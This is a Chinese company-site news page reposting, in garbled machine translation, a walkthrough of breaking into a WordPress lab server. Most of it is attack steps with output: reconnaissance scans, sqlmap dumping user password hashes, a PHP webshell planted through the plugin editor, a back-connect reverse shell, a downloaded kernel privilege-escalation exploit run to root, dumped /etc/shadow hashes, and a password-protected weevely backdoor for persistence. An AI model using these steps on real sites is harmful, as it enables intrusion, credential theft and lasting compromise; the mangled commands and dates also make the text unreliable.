无法在这个位置找到: head2.htm
当前位置: 建站首页 > 新闻 > 公司新闻 >

网络黑客是如何侵入你的网站的

时间:2021-03-17 07:01来源:未知 作者:jianzhan 点击:
短视頻,自新闻媒体,达人种草1站服务这个难题很难回应,简易的来讲,侵入1个网站能够有许多种方式。本文的目地是展现网络黑客们常见的扫描仪和侵入网站的技术性。假定你的站点

网络黑客是如何侵入你的网站的


短视頻,自新闻媒体,达人种草1站服务

这个难题很难回应,简易的来讲,侵入1个网站能够有许多种方式。本文的目地是展现网络黑客们常见的扫描仪和侵入网站的技术性。

假定你的站点是:hack-test

 

让大家来ping1下这个服务器:

 

大家获得了1个IP详细地址:173.236.138.113 这是大家总体目标服务器的IP详细地址。

Sameip 能够协助大家寻找别的与这个服务器关联的网站域名:

 

Same IP

26 sites hosted on IP Address 173.236.138.113

有26个站点在这台服务器上(173.236.138.113)。很多网络黑客会挑选进攻在同服务器上的不一样站点从而侵入到你的网站。可是出于以便学习培训目地,大家只挑选侵入你的服务器。

大家必须从你的站点获得1下信息内容:

1.DNS纪录(A,NS,TXT,MX 和SOA)

2.网站服务器的种类(Apache,IIS,Tomcat)

3.网站域名的申请注册信息内容(哪一个企业有着这个网站域名)

4.你的姓名,详细地址,EMAIL和电話

5.你的网站上所运作的脚本制作种类(PHP,ASP,ASP.NET,JSP,CFM)

6.服务器的实际操作系统软件种类(Unix,Linux,Windows,Solaris)

7.服务器扩大开放的端口号(80,443,21,等)

如今让大家来找寻网站的DNS纪录。挑选网站 Who.is 来完成这个总体目标。

 

大家发现站点上的DNS纪录有:

 

让大家来检验1下网站服务器的种类:

 

大家能够看到,网站服务器用的是Apache. 稍后大家会检验Apache的版本号。

HACK-TEST.COM SITE INFORMATION

IP: 173.236.138.113

Website Status: active

Server Type: Apache

Alexa Trend/Rank: 1 Month: 3,213,968 3 Month: 2,161,753

Page Views per Visit: 1 Month: 2.0 3 Month: 3.7

接下来大家来找寻1下网站域名的申请注册信息内容:

 

大家获得了申请注册者和别的关键的信息内容。大家能够用Whatweb来检验你的站点应用的是甚么脚本制作語言和实际操作系统软件种类和网站服务器的版本号。

 

 

大家能够看到,网站应用的是WordPress,实际操作系统软件种类是Fedora Linux,网站服务器版本号是Apache 2.2.15,下面大家来检验1下服务器上开启的端口号:

大家应用Nmap:

1.检验服务器上运作着哪些服务:

root@bt:/# nmap -sV hack-test

Starting Nmap 5.59BETA1 ( ) at 2011⑴2⑵8 06:39 EET

Nmap scan report for hack-test (192.168.1.2)

Host is up (0.0013s latency).

Not shown: 998 filtered ports

PORT STATE SERVICE VERSION

22/tcp closed ssh

80/tcp open Apache d 2.2.15 ((Fedora))

MAC Address: 00:0C:29:01:8A:4D (VMware)

Service detection performed. Please report any incorrect results at .

Nmap done: 1 IP address (1 host up) scanned in 11.56 seconds

2.检验服务器的OS

root@bt:/# nmap -O hack-test

Starting Nmap 5.59BETA1 ( ) at 2011⑴2⑵8 06:40 EET

Nmap scan report for hack-test (192.168.1.2)

Host is up (0.00079s latency).

Not shown: 998 filtered ports

PORT STATE SERVICE

22/tcp closed ssh

80/tcp open

MAC Address: 00:0C:29:01:8A:4D (VMware)

Device type: general purpose

Running: Linux 2.6.X

OS details: Linux 2.6.22 (Fedora Core 6)

Network Distance: 1 hop

OS detection performed. Please report any incorrect results at .

Nmap done: 1 IP address (1 host up) scanned in 7.42 seconds

服务器只对外开放了80端口号,实际操作系统软件是Linux 2.6.22(Fedora Core 6)

如今大家早已获得了全部关键的信息内容,接下来大家来做1下弱点检测,比如:sql引入,盲注,LFI,RFI,XSS,CSRF,等。

大家用Nikto.pl 来获得信息内容和弱点:

root@bt:/pentest/web/nikto# perl nikto.pl -h

- Nikto v2.1.4

---------------------------------------------------------------------------

+ Target IP: 192.168.1.2

+ Target Hostname: hack-test

+ Target Port: 80

+ Start Time: 2011⑴2⑵9 06:50:03

---------------------------------------------------------------------------

+ Server: Apache/2.2.15 (Fedora)

+ ETag header found on server, inode: 12748, size: 1475, mtime: 0x4996d177f5c3b

+ Apache/2.2.15 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current.

+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE

+ OSVDB⑻77: HTTP TRACE method is active, suggesting the host is vulnerable to XST

+ OSVDB⑶268: /icons/: Directory indexing found.

+ OSVDB⑶233: /icons/README: Apache default file found.

+ 6448 items checked: 1 error(s) and 6 item(s) reported on remote host

+ End Time: 2011⑴2⑵9 06:50:37 (34 seconds)

---------------------------------------------------------------------------

+ 1 host(s) tested

 

还可以应用W3AF,这个专用工具能够在Backtrack 5 R1中寻找

root@bt:/pentest/web/w3af# ./w3af_gui

Starting w3af, running on:

Python version:

2.6.5 (r265:79063, Apr 16 2010, 13:57:41)

[GCC 4.4.3]

GTK version: 2.20.1

PyGTK version: 2.17.0

w3af - Web Application Attack and Audit Framework

Version: 1.2

Revision: 4605

Author: Andres Riancho and the w3af team.

 

大家能够插进URL,挑选full audit选项:

 

稍等一会儿,結果就会出現。

 

网站存在着sql引入系统漏洞和别的的系统漏洞。

让大家来深层次1下sql引入:

 

这个详细地址便是引入点,

 

大家用sqlmap随后dump全部侵入所必须用到的数据信息库信息内容

sqlmap u url

 

稍等一会儿:

 

挑选 n 再次:

 

网站的sql引入种类是error-based Mysql数据信息库的版本号是5.

再加主要参数 -dbs 能够找出全部的数据信息库:

 

大家发现了3个数据信息库:

 

用dump Dwordpress -tables导出来wordpress数据信息库表

 

 

大家必须导出来 wp_users 表来获得客户信息内容和登陆密码的hash,以后大家便可以尝试着去破译登陆密码最后登录到wordpress的后台管理。

应用主要参数 -T wp_users columns

 

寻找了22列的数据信息:

 

应用主要参数 -C user_login,user_pass dump 来导出来列。

以后大家就获得了账户登陆密码。

 

接来应用这个网站来把MD5变换成密文登陆密码(其实不是全部HASH都能取得成功变换)

 

密文登陆密码是: q1w2e3

客户名 GeeMiller

让大家来登录wordpress的后台管理:

 

如今大家来试着提交1个php webshell 用来在这台服务器上实行1些linux指令

编写wordpress的 Textile 软件

编写它

 

插进1个php webshell来替代1个真实的软件。以后点一下提交,php webshell就被取得成功提交到服务器到了。

 

如今,PHP WEBSHELL就取得成功运作了。如今便可以访问网站里全部的文档了,可是大家想获得服务器的root管理权限随后侵入别的的站点。

挑选 在php webshell 里的 back-connect 随后联接到大家的ip 192.168.1.6 端口号 5555

 

在大家点一下联接以前,大家先得在本机上监视1个 5555 的端口号

 

点一下联接,大家会获得这样1个对话框:

 

大家来试1下linux的指令

id

uid=48(apache) gid=489(apache) groups=489(apache)

pwd

/var//html/Hackademic_RTB1/wp-content/plugins

uname -a

Linux HackademicRTB1 2.6.31.5⑴27.fc12.i686 #1 SMP Sat Nov 7 21:41:45 EST 2009 i686 i686 i386 GNU/Linux

 

ID指令用来告知大家客户ID和客户组

Pwd指令能告知大家如今所属的相对路径

uname a 指令用来获得1些信息内容和核心版本号

好了,大家如今了解服务器的核心版本号是2.6.31.5⑴27.fc12.1686

Ok, now we knew that server kernel version is 2.6.31.5⑴27.fc12.1686

大家能够在 exploit-db 寻找对于这个版本号的exploit

键入: kernel 2.6.31

 

以上結果沒有适合的,由于她们都并不是用来提权的。下1个,便是它了!

 

拷贝这个联接

在cat shell里键入:

wget -O roro.c

-⑵011⑴2⑵8 00:48:01--

Resolving exploit-db... 199.27.135.111, 199.27.134.111

Connecting to exploit-db|199.27.135.111|:80... connected.

HTTP request sent, awaiting response... 301 Moved Permanently

Location: [following]

-⑵011⑴2⑵8 00:48:02--

Connecting to exploit-db|199.27.135.111|:80... connected.

HTTP request sent, awaiting response... 200 OK

Length: 7154 (7.0K) [application/txt]

Saving to: `roro.c'

0K ...... 100% 29.7K=0.2s

 

大家用wget指令来获得exploit-db的exploit,-O是重取名文档为:roro.c

Note:

Linux核心的exploits大多数数全是用c語言开发设计的因此大家储存后缀名为.c ,立即访问源文档便可以立即看见源代码:

#include stdio.h

#include unistd.h

#include stdlib.h

#include ftl.h

#include

#include

#include

#include errno.h

#include string.h

#include

#include

#define RECVPORT 5555

#define SENDPORT 6666

intprep_sock(intport)

{

ints, ret;

structsockaddr_in addr;

s = socket(PF_RDS, SOCK_SEQPACKET, 0);

if(s 0) {

printf( [*] Could not open socket.\n );

exit(⑴);

}

2cto

memset( addr, 0, sizeof(addr));

All the above lines indicate that this is exploit is written in C language

After we saved our exploit on server, we will pile it to elf format by typing

大家储存exploit在服务器上以后,大家能够编译程序它:

g roro.c o roro

 

随后实行exploit:

./roro

[*] Linux kernel = 2.6.30 RDS socket exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses...

[+] Resolved rds_proto_ops to 0xe09f0b20

[+] Resolved rds_ioctl to 0xe09db06a

[+] Resolved mit_creds to 0xc044e5f1

[+] Resolved prepare_kernel_cred to 0xc044e452

[*] Overwriting function pointer...

[*] Linux kernel = 2.6.30 RDS socket exploit

[*] by Dan Rosenberg

[*] Resolving kernel addresses...

[+] Resolved rds_proto_ops to 0xe09f0b20

[+] Resolved rds_ioctl to 0xe09db06a

[+] Resolved mit_creds to 0xc044e5f1

[+] Resolved prepare_kernel_cred to 0xc044e452

[*] Overwriting function pointer...

[*] Triggering payload...

[*] Restoring function pointer...

Id

这时候候大家早已是root管理权限了。

uid=0(root) gid=0(root)

 

大家能够访问 /etc/shadow file

cat /etc/shadow

root:$6$4l1OVmLPSV28eVCT$FqycC5mozZ8mqiqgfudLsHUk7R1EMU/FXw3pOcOb39LXekt9VY6HyGkXcLEO.ab9F9t7BqTdxSJvCcy.iYlcp0:14981:0:99999:7:::

bin:*:14495:0:99999:7:::

daemon:*:14495:0:99999:7:::

adm:*:14495:0:99999:7:::

lp:*:14495:0:99999:7:::

sync:*:14495:0:99999:7:::

shutdown:*:14495:0:99999:7:::

halt:*:14495:0:99999:7:::

mail:*:14495:0:99999:7:::

uucp:*:14495:0:99999:7:::

operator:*:14495:0:99999:7:::

games:*:14495:0:99999:7:::

gopher:*:14495:0:99999:7:::

ftp:*:14495:0:99999:7:::

nobody:*:14495:0:99999:7:::

vcsa:!!:14557::::::

avahi-autoipd:!!:14557::::::

ntp:!!:14557::::::

dbus:!!:14557::::::

rtkit:!!:14557::::::

nscd:!!:14557::::::

tcpdump:!!:14557::::::

avahi:!!:14557::::::

haldaemon:!!:14557::::::

openvpn:!!:14557::::::

apache:!!:14557::::::

saslauth:!!:14557::::::

mailnull:!!:14557::::::

smmsp:!!:14557::::::

smolt:!!:14557::::::

sshd:!!:14557::::::

pulse:!!:14557::::::

gdm:!!:14557::::::

p0wnbox.Team:$6$rPArLuwe8rM9Avwv$a5coOdUCQQY7NgvTnXaFj2D5SmggRrFsr6TP8g7IATVeEt37LUGJYvHM1myhelCyPkIjd8Yv5olMnUhwbQL76/:14981:0:99999:7:::

mysql:!!:14981::::::

访问 /etc/passwd file

cat /etc/passwd

root:x:0:0:root:/root:/bin/bash

bin:x:1:1:bin:/bin:/sbin/nologin

daemon:x:2:2:daemon:/sbin:/sbin/nologin

adm:x:3:4:adm:/var/adm:/sbin/nologin

lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin

sync:x:5:0:sync:/sbin:/bin/sync

shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown

halt:x:7:0:halt:/sbin:/sbin/halt

mail:x:8:12:mail:/var/spool/mail:/sbin/nologin

uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

operator:x:11:0:operator:/root:/sbin/nologin

games:x:12:100:games:/usr/games:/sbin/nologin

gopher:x:13:30:gopher:/var/gopher:/sbin/nologin

ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin

nobody:x:99:99:Nobody:/:/sbin/nologin

vcsa:x:69:499:virtual console memory owner:/dev:/sbin/nologin

avahi-autoipd:x:499:498:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin

ntp:x:38:38::/etc/ntp:/sbin/nologin

dbus:x:81:81:System message bus:/:/sbin/nologin

rtkit:x:498:494:RealtimeKit:/proc:/sbin/nologin

nscd:x:28:493:NSCD Daemon:/:/sbin/nologin

tcpdump:x:72:72::/:/sbin/nologin

avahi:x:497:492:avahi-daemon:/var/run/avahi-daemon:/sbin/nologin

haldaemon:x:68:491:HAL daemon:/:/sbin/nologin

openvpn:x:496:490:OpenVPN:/etc/openvpn:/sbin/nologin

apache:x:48:489:Apache:/var/:/sbin/nologin

saslauth:x:495:488:"Saslauthd user":/var/empty/saslauth:/sbin/nologin

mailnull:x:47:487::/var/spool/mqueue:/sbin/nologin

smmsp:x:51:486::/var/spool/mqueue:/sbin/nologin

smolt:x:494:485:Smolt:/usr/share/smolt:/sbin/nologin

sshd:x:74:484:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin

pulse:x:493:483:PulseAudio System Daemon:/var/run/pulse:/sbin/nologin

gdm:x:42:481::/var/lib/gdm:/sbin/nologin

p0wnbox.Team:x:500:500:p0wnbox.Team:/home/p0wnbox.Team:/bin/bash

mysql:x:27:480:MySQL Server:/var/lib/mysql:/bin/bash

大家能够用 john the ripper 来破译客户的登陆密码,但大家不容易这么做。

网络黑客必须留1个后门在服务器上,便捷之后浏览。

这里,大家应用weevely来转化成1个小型有登陆密码的php后门,随后提交到服务器上来做到目地。

weevely 用法 :

root@bt:/pentest/backdoors/web/weevely# ./main.py -

Weevely 0.3 - Generate and manage stealth PHP backdoors.

Copyright (c) 2011⑵012 Weevely Developers

Website:

Usage: main.py [options]

Options:

-h, --help show this help message and exit

-g, --generate Generate backdoor crypted code, requires -o and -p .

-o OUTPUT, --output=OUTPUT

Output filename for generated backdoor .

-c COMMAND, --mand=COMMAND

Execute a single mand and exit, requires -u and -p

.

-t, --terminal Start a terminal-like session, requires -u and -p .

-C CLUSTER, --cluster=CLUSTER

Start in cluster mode reading items from the give

file, in the form 'label,url,password' where label is

optional.

-p PASSWORD, --password=PASSWORD

Password of the encrypted backdoor .

-u URL, --url=URL Remote backdoor URL .

建立1个带登陆密码的php后门

root@bt:/pentest/backdoors/web/weevely# ./main.py -g -o hax.php -p koko

Weevely 0.3 - Generate and manage stealth PHP backdoors.

Copyright (c) 2011⑵012 Weevely Developers

Website:

+ Backdoor file 'hax.php' created with password 'koko'.

 

根据php webshell提交1个php后门

 

 

提交结束以后大家应用1下指令来联接:

root@bt:/pentest/backdoors/web/weevely# ./main.py -t -u -p koko

Weevely 0.3 - Generate and manage stealth PHP backdoors.

Copyright (c) 2011⑵012 Weevely Developers

Website:

+ Using method 'system()'.

+ Retrieving terminal basic environment variables .

[apache@HackademicRTB1 /var//html/Hackademic_RTB1/wp-content/plugins]

 

检测大家的 hax.php 后门

 

[via infosecinstitute 译ppsbb]

SEO专题强烈推荐:

重要词提升专题:网站重要词提升没实际效果?来这里学习培训最好用的重要词提升技能!

内链提升专题:最能提高网站权重的内链布署提升技能与方式

外链基本建设专题:高品质当然外链如何做?读完这些你将质的飞越

网站降权专题:2015年最有效的网站降权、被K、被黑、被进攻的处理方式

客户体验专题:学习培训完这些,做为站长的你能够秒懂怎样做网站客户体验

制造行业网站专题:提升制造行业网站的 葵花宝典 看完后无提升工作压力


(责任编辑:admin)
织梦二维码生成器
顶一下
(0)
0%
踩一下
(0)
0%
------分隔线----------------------------
无法在这个位置找到: ajaxfeedback.htm
栏目列表
推荐内容


扫描二维码分享到微信

在线咨询
联系电话

400-888-8866